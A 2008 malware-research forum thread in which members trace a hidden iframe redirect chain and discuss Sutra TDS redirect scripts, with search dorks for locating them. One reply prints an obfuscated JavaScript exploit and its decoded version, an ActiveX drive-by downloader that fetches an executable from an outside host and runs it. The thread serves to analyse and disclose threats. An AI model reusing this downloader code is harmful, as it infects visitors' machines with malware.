Author Topic: gost.freehostia.com  (Read 6801 times)

0 Members and 1 Guest are viewing this topic.

June 14, 2008, 01:33:10 pm
Read 6801 times

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
hxxp://gost.freehostia.com/gate/gate.php has got a link to an iframe,
<iframe src="hxxp://ruoo.info/2205/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

That link takes you to a second iframe,
<iframe src="hxxp://countermediagroup.com/ts/in.cgi?mymy" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

That link takes you to two more iframes,
<iframe src="hxxp://countermediagroup.com/ts/in.cgi?reyden" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="hxxp://sendsmsfree.ru/f/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

From countermediagroup.com/ts/in.cgi,
Error: 'can't open redirects.log file'

From sendsmsfree.ru/f/index.php you two cookies, no code on the page at all,
SL_mymy_0000=_10000_
TSUSER=mymy

Comment, you can only visit gost.freehostia.com/gate/gate.php once, after that you just get a blank page.
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

June 14, 2008, 08:43:47 pm
Reply #1

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

From countermediagroup.com/ts/in.cgi,
Error: 'can't open redirects.log file'

The in.cgi script I believe is Sutra TDS http://kytoon.com/sutra-tds.html, in itself a legitimate traffic direction script, however it is often used for malicious purposes to direct users to exploits or rogue sites etc..

You can see there are quite a lot of those sites listed:
http://www.malwaredomainlist.com/mdl.php?search=in.cgi

"Error: 'can't open redirects.log file'" is one way of finding more of these sites. You normally get this error message if you don't supply the right parameter in.cgi?parameter. Normally a number, experimenting with different numbers can lead to different sites.

The script will only work with the exact domain, so if it is set for domain.com www.domain.com will give an error, and vice versa. This is the error you get:
"Error: 'Please use parameters provided with your package (ih=*)'"

And other ways to find this script of course:
inurl:"in.cgi?default"
Different search engines may give different results.

Browsing to the parent directory will sometimes take you to the login page:
"user enter" "bos enter"
 

From sendsmsfree.ru/f/index.php you two cookies, no code on the page at all,
SL_mymy_0000=_10000_
TSUSER=mymy

Comment, you can only visit gost.freehostia.com/gate/gate.php once, after that you just get a blank page.

When you visit that page you get:

Code: [Select]
<html>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html><script language=JavaScript>str = "qnfo`mh)(: gtobuhno!qnfo`mh)(!z w`s!vldoeds!<!enbtldou/bsd`udDmdldou)&nckdbu&(: vldoeds/rdu@uushctud)&he&-&vldoeds&(: vldoeds/rdu@uushctud)&bm`rrhe&-&b&*&m&*#rhe;C#*#E8#*&7B447,74&*#@2,00#*&E1,892@,1&*#1B#*&15G&*#B38#*&D27&(: usx!z w`s!ppppp!<!vldoeds/Bsd`udNckdbu)&l&*#ry#*&lm3&*#/#*&Y&*#LM#*&I&*&UUQ&-&&(: w`s!vvvvv!<!vldoeds/Bsd`udNckdbu)#Ri#*#dmm/@#*#q#*#qmhb`#*#uhno#-&&(: w`s!ddddd!<!vldoeds/Bsd`udNckdbu)&`&*&e&*#nec/#*&ru&*#s#*&d`l&-&&(: usx!z!ddddd/uxqd!<!0: ppppp/nqdo)&F&*#D#*&U&-&iuuq;..rdoerlrgsdd/st.g.mn`e/qiq&-g`mrd(: ppppp/rdoe)(:!ddddd/nqdo)(: ddddd/Vshud)ppppp/sdrqnordCnex(: w`s!hlx`!<!&/..//..rbinrru/dyd&: ddddd/R`wdUnGhmd)hlx`-3(: ddddd/Bmnrd)(: |!b`ubi)d(!z| usx!z!vvvvv/ridmmdydbtud)hlx`(:!|!b`ubi)d(!z|| b`ubi)d(z||";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></html>
 

Decoded with malzilla:

Code: [Select]
pognali();

function pognali() {

var wmender = document.createElement('object');

wmender.setAttribute('id','wmender');

wmender.setAttribute('classid','c'+'l'+"sid:B"+"D9"+'6C556-65'+"A3-11"+'D0-983A-0'+"0C"+'04F'+"C29"+'E36');

try {

var qqqqq = wmender.CreateObject('m'+"sx"+'ml2'+"."+'X'+"ML"+'H'+'TTP','');

var wwwww = wmender.CreateObject("Sh"+"ell.A"+"p"+"plica"+"tion",'');

var eeeee = wmender.CreateObject('a'+'d'+"odb."+'st'+"r"+'eam','');

try { eeeee.type = 1;

qqqqq.open('G'+"E"+'T','http://sendsmsfree.ru/f/load.php',false);

qqqqq.send(); eeeee.open();

eeeee.Write(qqqqq.responseBody);

var imya = './/..//schosst.exe';

eeeee.SaveToFile(imya,2);

eeeee.Close();

} catch(e) {}

try { wwwww.shellexecute(imya); } catch(e) {}}

catch(e){}}
 

June 15, 2008, 12:05:26 pm
Reply #2

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Intresting, i think sendsmsfree.ru/f/index.php must be useragent senestive, yesterday i got nothing but the cookies, today i got
Code: [Select]
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /f/index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2 Server at sendsmsfree.ru Port 80</address>
</body></html>

Which is totaly different to the 404 JohnC grabed from the link.

Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment